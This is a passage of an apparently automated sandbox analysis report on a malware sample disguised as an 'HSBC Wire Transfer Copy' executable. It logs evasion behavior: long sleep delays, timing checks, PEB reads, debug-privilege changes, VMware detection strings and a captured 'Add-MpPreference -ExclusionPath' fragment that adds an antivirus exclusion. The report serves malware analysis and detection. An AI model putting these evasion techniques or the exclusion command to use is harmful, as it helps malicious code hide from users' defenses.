          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239841s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7036Thread sleep count: 1635 > 30Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 6896Thread sleep time: -36646s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239686s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239577s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239452s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239342s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239233s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239124s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238999s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238889s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238781s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238670s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238560s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238453s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238343s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -237203s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -236703s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -236534s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -236406s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 6936Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6628Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6264Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00409AB0 rdtsc 6_2_00409AB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239841Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239686Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239577Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239452Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239342Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239233Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239124Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238999Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238889Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238781Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238670Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238560Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238453Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238343Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238000Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 237203Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236703Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236534Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236406Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeWindow / User API: threadDelayed 985Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeWindow / User API: threadDelayed 1635Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239841Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 36646Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239686Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239577Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239452Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239342Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239233Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239124Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238999Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238889Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238781Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238670Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238560Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238453Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238343Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238000Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 237203Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236703Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236534Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236406Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000000C.00000000.303809038.000000000EE50000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1
          Source: explorer.exe, 0000000C.00000000.303809038.000000000EE50000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b1
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000C.00000000.301310176.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000C.00000000.335138574.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 0000000C.00000000.330618506.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000C.00000000.301310176.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 0000000C.00000000.330618506.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 0000000C.00000000.301310176.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00409AB0 rdtsc 6_2_00409AB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162C962 mov eax, dword ptr fs:[00000030h]6_2_0162C962
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162B171 mov eax, dword ptr fs:[00000030h]6_2_0162B171
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162B171 mov eax, dword ptr fs:[00000030h]6_2_0162B171
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164B944 mov eax, dword ptr fs:[00000030h]6_2_0164B944
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164B944 mov eax, dword ptr fs:[00000030h]6_2_0164B944
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]6_2_01644120
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]6_2_01644120
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]6_2_01644120
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]6_2_01644120
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01644120 mov ecx, dword ptr fs:[00000030h]6_2_01644120
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165513A mov eax, dword ptr fs:[00000030h]6_2_0165513A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165513A mov eax, dword ptr fs:[00000030h]6_2_0165513A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629100 mov eax, dword ptr fs:[00000030h]6_2_01629100
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629100 mov eax, dword ptr fs:[00000030h]6_2_01629100
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629100 mov eax, dword ptr fs:[00000030h]6_2_01629100
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016B41E8 mov eax, dword ptr fs:[00000030h]6_2_016B41E8
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162B1E1 mov eax, dword ptr fs:[00000030h]6_2_0162B1E1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162B1E1 mov eax, dword ptr fs:[00000030h]6_2_0162B1E1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162B1E1 mov eax, dword ptr fs:[00000030h]6_2_0162B1E1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016561A0 mov eax, dword ptr fs:[00000030h]6_2_016561A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016561A0 mov eax, dword ptr fs:[00000030h]6_2_016561A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]6_2_016E49A4
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]6_2_016E49A4
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]6_2_016E49A4
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]6_2_016E49A4
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A69A6 mov eax, dword ptr fs:[00000030h]6_2_016A69A6
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]6_2_016A51BE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]6_2_016A51BE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]6_2_016A51BE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]6_2_016A51BE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A185 mov eax, dword ptr fs:[00000030h]6_2_0165A185
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164C182 mov eax, dword ptr fs:[00000030h]6_2_0164C182
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652990 mov eax, dword ptr fs:[00000030h]6_2_01652990
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F1074 mov eax, dword ptr fs:[00000030h]6_2_016F1074
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2073 mov eax, dword ptr fs:[00000030h]6_2_016E2073
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01640050 mov eax, dword ptr fs:[00000030h]6_2_01640050
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01640050 mov eax, dword ptr fs:[00000030h]6_2_01640050
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]6_2_0165002D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]6_2_0165002D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]6_2_0165002D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]6_2_0165002D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]6_2_0165002D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]6_2_0163B02A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]6_2_0163B02A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]6_2_0163B02A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]6_2_0163B02A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]6_2_0164A830
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]6_2_0164A830
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]6_2_0164A830
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]6_2_0164A830
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F4015 mov eax, dword ptr fs:[00000030h]6_2_016F4015
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F4015 mov eax, dword ptr fs:[00000030h]6_2_016F4015
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A7016 mov eax, dword ptr fs:[00000030h]6_2_016A7016
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A7016 mov eax, dword ptr fs:[00000030h]6_2_016A7016
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A7016 mov eax, dword ptr fs:[00000030h]6_2_016A7016
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164B8E4 mov eax, dword ptr fs:[00000030h]6_2_0164B8E4
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164B8E4 mov eax, dword ptr fs:[00000030h]6_2_0164B8E4
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016240E1 mov eax, dword ptr fs:[00000030h]6_2_016240E1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016240E1 mov eax, dword ptr fs:[00000030h]6_2_016240E1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016240E1 mov eax, dword ptr fs:[00000030h]6_2_016240E1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016258EC mov eax, dword ptr fs:[00000030h]6_2_016258EC
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]6_2_016BB8D0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BB8D0 mov ecx, dword ptr fs:[00000030h]6_2_016BB8D0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]6_2_016BB8D0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]6_2_016BB8D0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]6_2_016BB8D0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]6_2_016BB8D0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]6_2_016520A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]6_2_016520A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]6_2_016520A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]6_2_016520A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]6_2_016520A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]6_2_016520A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016690AF mov eax, dword ptr fs:[00000030h]6_2_016690AF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165F0BF mov ecx, dword ptr fs:[00000030h]6_2_0165F0BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165F0BF mov eax, dword ptr fs:[00000030h]6_2_0165F0BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165F0BF mov eax, dword ptr fs:[00000030h]6_2_0165F0BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629080 mov eax, dword ptr fs:[00000030h]6_2_01629080
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A3884 mov eax, dword ptr fs:[00000030h]6_2_016A3884
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A3884 mov eax, dword ptr fs:[00000030h]6_2_016A3884
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162DB60 mov ecx, dword ptr fs:[00000030h]6_2_0162DB60
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01653B7A mov eax, dword ptr fs:[00000030h]6_2_01653B7A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01653B7A mov eax, dword ptr fs:[00000030h]6_2_01653B7A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162DB40 mov eax, dword ptr fs:[00000030h]6_2_0162DB40
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8B58 mov eax, dword ptr fs:[00000030h]6_2_016F8B58
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162F358 mov eax, dword ptr fs:[00000030h]6_2_0162F358
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
